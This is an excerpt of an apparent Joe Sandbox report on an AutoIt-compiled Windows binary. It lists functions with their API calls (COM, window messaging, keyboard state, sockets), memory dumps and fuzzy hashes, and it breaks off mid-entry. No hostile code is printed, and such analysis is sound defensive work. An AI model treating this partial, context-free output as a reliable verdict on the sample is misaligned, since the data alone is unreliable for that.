                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Variant$ClearInit
                                                                                                                                                                                                                                  • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                                                                                                                                                                                  • API String ID: 2610073882-625585964
                                                                                                                                                                                                                                  • Opcode ID: 78d511fcb37d1be044dc35e7133035783aa66b913f443efd54cc59d14760bc67
                                                                                                                                                                                                                                  • Instruction ID: a6f0cd56d871801b7c9ad0908be1ea15438f7d5d06d76dcd4236ab7ed5752ea2
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 78d511fcb37d1be044dc35e7133035783aa66b913f443efd54cc59d14760bc67
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B0917C71E00619EFDF24DFA4C888FEEBBB8AF85714F108519F515AB280D7709985CBA0
                                                                                                                                                                                                                                  Function 00A01B46 Relevance: 10.8, APIs: 7, Instructions: 254COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • SafeArrayGetVartype.OLEAUT32(00000000,?), ref: 00A01C1B
                                                                                                                                                                                                                                  • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00A01C43
                                                                                                                                                                                                                                  • SafeArrayUnaccessData.OLEAUT32(00000000), ref: 00A01C67
                                                                                                                                                                                                                                  • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00A01C97
                                                                                                                                                                                                                                  • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00A01D1E
                                                                                                                                                                                                                                  • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00A01D83
                                                                                                                                                                                                                                  • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00A01DEF
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ArraySafe$Data$Access$UnaccessVartype
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2550207440-0
                                                                                                                                                                                                                                  • Opcode ID: 92b7c99b4c5250753762cd6b2e0803a8bf2304c45ce1b0b259f600433862bca8
                                                                                                                                                                                                                                  • Instruction ID: 734f926afa967d7805f0801708078abff437e9bcd64e8e055bf24a73a129141e
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 92b7c99b4c5250753762cd6b2e0803a8bf2304c45ce1b0b259f600433862bca8
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1A91BD71A00219AFEB00DFA8E885BFEB7B4FF45725F148029E951AB2D1D774E941CB90
                                                                                                                                                                                                                                  Function 00A143A4 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 240COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • VariantInit.OLEAUT32(?), ref: 00A143C8
                                                                                                                                                                                                                                  • CharUpperBuffW.USER32(?,?), ref: 00A144D7
                                                                                                                                                                                                                                  • _wcslen.LIBCMT ref: 00A144E7
                                                                                                                                                                                                                                  • VariantClear.OLEAUT32(?), ref: 00A1467C
                                                                                                                                                                                                                                    • Part of subcall function 00A0169E: VariantInit.OLEAUT32(00000000), ref: 00A016DE
                                                                                                                                                                                                                                    • Part of subcall function 00A0169E: VariantCopy.OLEAUT32(?,?), ref: 00A016E7
                                                                                                                                                                                                                                    • Part of subcall function 00A0169E: VariantClear.OLEAUT32(?), ref: 00A016F3
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
                                                                                                                                                                                                                                  • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                                                                                                                                                                                  • API String ID: 4137639002-1221869570
                                                                                                                                                                                                                                  • Opcode ID: d609b9a061cf62c2d71b595677ee0b62e5f9b6feefe6d6ce5de9ac73410bed3c
                                                                                                                                                                                                                                  • Instruction ID: a13d4a30bec57607497a176c914a75d3928b59a65a501325cfef90bc2a151834
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d609b9a061cf62c2d71b595677ee0b62e5f9b6feefe6d6ce5de9ac73410bed3c
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 799159746083019FCB14EF68C5809AAB7E5FF89714F14892DF89A9B351DB31ED46CB82
                                                                                                                                                                                                                                  Function 00A1560A Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 236COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 009F08FE: CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,009F0831,80070057,?,?,?,009F0C4E), ref: 009F091B
                                                                                                                                                                                                                                    • Part of subcall function 009F08FE: ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,009F0831,80070057,?,?), ref: 009F0936
                                                                                                                                                                                                                                    • Part of subcall function 009F08FE: lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,009F0831,80070057,?,?), ref: 009F0944
                                                                                                                                                                                                                                    • Part of subcall function 009F08FE: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,009F0831,80070057,?), ref: 009F0954
                                                                                                                                                                                                                                  • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,00000001,?,?), ref: 00A156AE
                                                                                                                                                                                                                                  • _wcslen.LIBCMT ref: 00A157B6
                                                                                                                                                                                                                                  • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 00A1582C
                                                                                                                                                                                                                                  • CoTaskMemFree.OLE32(?), ref: 00A15837
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: FreeFromProgTask$CreateInitializeInstanceSecurity_wcslenlstrcmpi
                                                                                                                                                                                                                                  • String ID: NULL Pointer assignment
                                                                                                                                                                                                                                  • API String ID: 614568839-2785691316
                                                                                                                                                                                                                                  • Opcode ID: 746231fa5d7fe9c1f20d757403938ba59f2dc163eb18c0608eabc144ca9e6c68
                                                                                                                                                                                                                                  • Instruction ID: dcfe8e237b9a65c26d5ced9e418016056638a683d8d6010d9d02a07e428124fa
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 746231fa5d7fe9c1f20d757403938ba59f2dc163eb18c0608eabc144ca9e6c68
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3E911771D0021DEFDF10DFA8D881AEEB7B9BF48310F10456AE915A7291EB349A45CFA0
                                                                                                                                                                                                                                  Function 00A22B99 Relevance: 10.7, APIs: 7, Instructions: 196windowCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetMenu.USER32(?), ref: 00A22C1F
                                                                                                                                                                                                                                  • GetMenuItemCount.USER32(00000000), ref: 00A22C51
                                                                                                                                                                                                                                  • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00A22C79
                                                                                                                                                                                                                                  • _wcslen.LIBCMT ref: 00A22CAF
                                                                                                                                                                                                                                  • GetMenuItemID.USER32(?,?), ref: 00A22CE9
                                                                                                                                                                                                                                  • GetSubMenu.USER32(?,?), ref: 00A22CF7
                                                                                                                                                                                                                                    • Part of subcall function 009F4393: GetWindowThreadProcessId.USER32(?,00000000), ref: 009F43AD
                                                                                                                                                                                                                                    • Part of subcall function 009F4393: GetCurrentThreadId.KERNEL32 ref: 009F43B4
                                                                                                                                                                                                                                    • Part of subcall function 009F4393: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,009F2F00), ref: 009F43BB
                                                                                                                                                                                                                                  • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00A22D7F
                                                                                                                                                                                                                                    • Part of subcall function 009FF292: Sleep.KERNEL32 ref: 009FF30A
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 4196846111-0
                                                                                                                                                                                                                                  • Opcode ID: 2ae49b190ff8b4cae51576e5bbf199699589b967a023530f27254e4103afb43e
                                                                                                                                                                                                                                  • Instruction ID: 8622ed60eb149539953ecea1377709778a1fc3932402cd566ef6bea2b9e52c92
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2ae49b190ff8b4cae51576e5bbf199699589b967a023530f27254e4103afb43e
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C7717075A00215AFCF14EF68D945BAEB7B1EF88310F148469E816EB351DB74ED42CB90
                                                                                                                                                                                                                                  Function 00A288F9 Relevance: 10.7, APIs: 7, Instructions: 193windowCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • IsWindow.USER32(00000000), ref: 00A28992
                                                                                                                                                                                                                                  • IsWindowEnabled.USER32(00000000), ref: 00A2899E
                                                                                                                                                                                                                                  • SendMessageW.USER32(00000000,0000041C,00000000,00000000), ref: 00A28A79
                                                                                                                                                                                                                                  • SendMessageW.USER32(00000000,000000B0,?,?), ref: 00A28AAC
                                                                                                                                                                                                                                  • IsDlgButtonChecked.USER32(?,00000000), ref: 00A28AE4
                                                                                                                                                                                                                                  • GetWindowLongW.USER32(00000000,000000EC), ref: 00A28B06
                                                                                                                                                                                                                                  • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 00A28B1E
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 4072528602-0
                                                                                                                                                                                                                                  • Opcode ID: 3a640211ba9af27d360fda259f1185b7a5074474551e948e9001c73f61db6387
                                                                                                                                                                                                                                  • Instruction ID: dabc1da964746230bf2e2fec65f0ef29465e6f3c97bd2dbcc0e49fd172256094
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3a640211ba9af27d360fda259f1185b7a5074474551e948e9001c73f61db6387
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F171AF74602224AFEB21DF98E884FBA7BB9FF49340F140469F94567261CB39AD81CB50
                                                                                                                                                                                                                                  Function 009FB881 Relevance: 10.7, APIs: 7, Instructions: 162windowCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetParent.USER32(?), ref: 009FB8C0
                                                                                                                                                                                                                                  • GetKeyboardState.USER32(?), ref: 009FB8D5
                                                                                                                                                                                                                                  • SetKeyboardState.USER32(?), ref: 009FB936
                                                                                                                                                                                                                                  • PostMessageW.USER32(?,00000101,00000010,?), ref: 009FB964
                                                                                                                                                                                                                                  • PostMessageW.USER32(?,00000101,00000011,?), ref: 009FB983
                                                                                                                                                                                                                                  • PostMessageW.USER32(?,00000101,00000012,?), ref: 009FB9C4
                                                                                                                                                                                                                                  • PostMessageW.USER32(?,00000101,0000005B,?), ref: 009FB9E7
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: MessagePost$KeyboardState$Parent
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 87235514-0
                                                                                                                                                                                                                                  • Opcode ID: dbcd077248d04da970b8635e05fde326afa3ce66f782a57deedaf3572d0c4d3f
                                                                                                                                                                                                                                  • Instruction ID: c95742cdc99cad831bc7cfda319b6a31967cb9814d76c9a01b1faccd45b0286a
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: dbcd077248d04da970b8635e05fde326afa3ce66f782a57deedaf3572d0c4d3f
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1351AFA06087D93EFB364A38CC55BBABEAD5B46708F088489E3D5468D2C3D8EDC4D750
                                                                                                                                                                                                                                  Function 009FB6A1 Relevance: 10.7, APIs: 7, Instructions: 161windowCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetParent.USER32(00000000), ref: 009FB6E0
                                                                                                                                                                                                                                  • GetKeyboardState.USER32(?), ref: 009FB6F5
                                                                                                                                                                                                                                  • SetKeyboardState.USER32(?), ref: 009FB756
                                                                                                                                                                                                                                  • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 009FB782
                                                                                                                                                                                                                                  • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 009FB79F
                                                                                                                                                                                                                                  • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 009FB7DE
                                                                                                                                                                                                                                  • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 009FB7FF
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: MessagePost$KeyboardState$Parent
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 87235514-0
                                                                                                                                                                                                                                  • Opcode ID: 6c932efb9ab1505824889f3e54515ba2a67141aed04f7f9437c547f57f1c22dd
                                                                                                                                                                                                                                  • Instruction ID: f7962494b12551d883a0e75b96bfd594b8a84e19920d451e77cc66982ad9410d
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6c932efb9ab1505824889f3e54515ba2a67141aed04f7f9437c547f57f1c22dd
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BF5106A0A087D93DFB329B74CC55B7A7EAD6B85344F0C8489E2D5468D2D394EC84D750
                                                                                                                                                                                                                                  Function 009C57A1 Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetConsoleCP.KERNEL32(FF8BC35D,00000000,?,?,?,?,?,?,?,009C5F16,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 009C57E3
                                                                                                                                                                                                                                  • __fassign.LIBCMT ref: 009C585E
                                                                                                                                                                                                                                  • __fassign.LIBCMT ref: 009C5879
                                                                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 009C589F
                                                                                                                                                                                                                                  • WriteFile.KERNEL32(?,FF8BC35D,00000000,009C5F16,00000000,?,?,?,?,?,?,?,?,?,009C5F16,?), ref: 009C58BE
                                                                                                                                                                                                                                  • WriteFile.KERNEL32(?,?,00000001,009C5F16,00000000,?,?,?,?,?,?,?,?,?,009C5F16,?), ref: 009C58F7
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1324828854-0
                                                                                                                                                                                                                                  • Opcode ID: 2f51fda67d9a11effcca8f0ef2a8c4ee27fc563de9fbaf01f31399bfba27633a
                                                                                                                                                                                                                                  • Instruction ID: 03623653090ec4e55ad8394d9270d3bbe1e4b6e894f94925ba783bf830f41de4
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2f51fda67d9a11effcca8f0ef2a8c4ee27fc563de9fbaf01f31399bfba27633a
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4E51A070E00649AFCB10CFA8D881FEEBBB8EF08310F15415EE952E7291D730A981DB61
                                                                                                                                                                                                                                  Function 009B3090 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • _ValidateLocalCookies.LIBCMT ref: 009B30BB
                                                                                                                                                                                                                                  • ___except_validate_context_record.LIBVCRUNTIME ref: 009B30C3
                                                                                                                                                                                                                                  • _ValidateLocalCookies.LIBCMT ref: 009B3151
                                                                                                                                                                                                                                  • __IsNonwritableInCurrentImage.LIBCMT ref: 009B317C
                                                                                                                                                                                                                                  • _ValidateLocalCookies.LIBCMT ref: 009B31D1
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                                                                  • String ID: csm
                                                                                                                                                                                                                                  • API String ID: 1170836740-1018135373
                                                                                                                                                                                                                                  • Opcode ID: 33e10974302683227e09ab6bee274790542596c6f62f9f524f4051ff29232e04
                                                                                                                                                                                                                                  • Instruction ID: 2085ce4f443211d3ef6c497acc8ef2540f34987297a301726c58d4829f4b769f
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 33e10974302683227e09ab6bee274790542596c6f62f9f524f4051ff29232e04
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C7416D34A04218ABCB10DFACC985AEEBBA9AF45334F14C555E815AB392D7319B05CB91
                                                                                                                                                                                                                                  Function 00A11B15 Relevance: 10.6, APIs: 7, Instructions: 110networkCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 00A13AAB: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00A13AD7
                                                                                                                                                                                                                                    • Part of subcall function 00A13AAB: _wcslen.LIBCMT ref: 00A13AF8
                                                                                                                                                                                                                                  • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00A11B6F
                                                                                                                                                                                                                                  • WSAGetLastError.WSOCK32 ref: 00A11B7E
                                                                                                                                                                                                                                  • WSAGetLastError.WSOCK32 ref: 00A11C26
                                                                                                                                                                                                                                  • closesocket.WSOCK32(00000000), ref: 00A11C56
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ErrorLast$_wcslenclosesocketinet_addrsocket
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2675159561-0
                                                                                                                                                                                                                                  • Opcode ID: 240a6a9b38cdebeb14e75314bd9e3643cf9e1664c3ed3ed5d79881b6b7f2f556
                                                                                                                                                                                                                                  • Instruction ID: d60d7ab2ff4f573aaf0f958c42097b20522de692bd74676188b19ce773f8b422
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 240a6a9b38cdebeb14e75314bd9e3643cf9e1664c3ed3ed5d79881b6b7f2f556
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: AB41D671604114AFDB20DF68C845BF9B7E9EF85324F148069F9099B292D774ED82CBE1
                                                                                                                                                                                                                                  Function 009FD7AB Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 108filestringCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
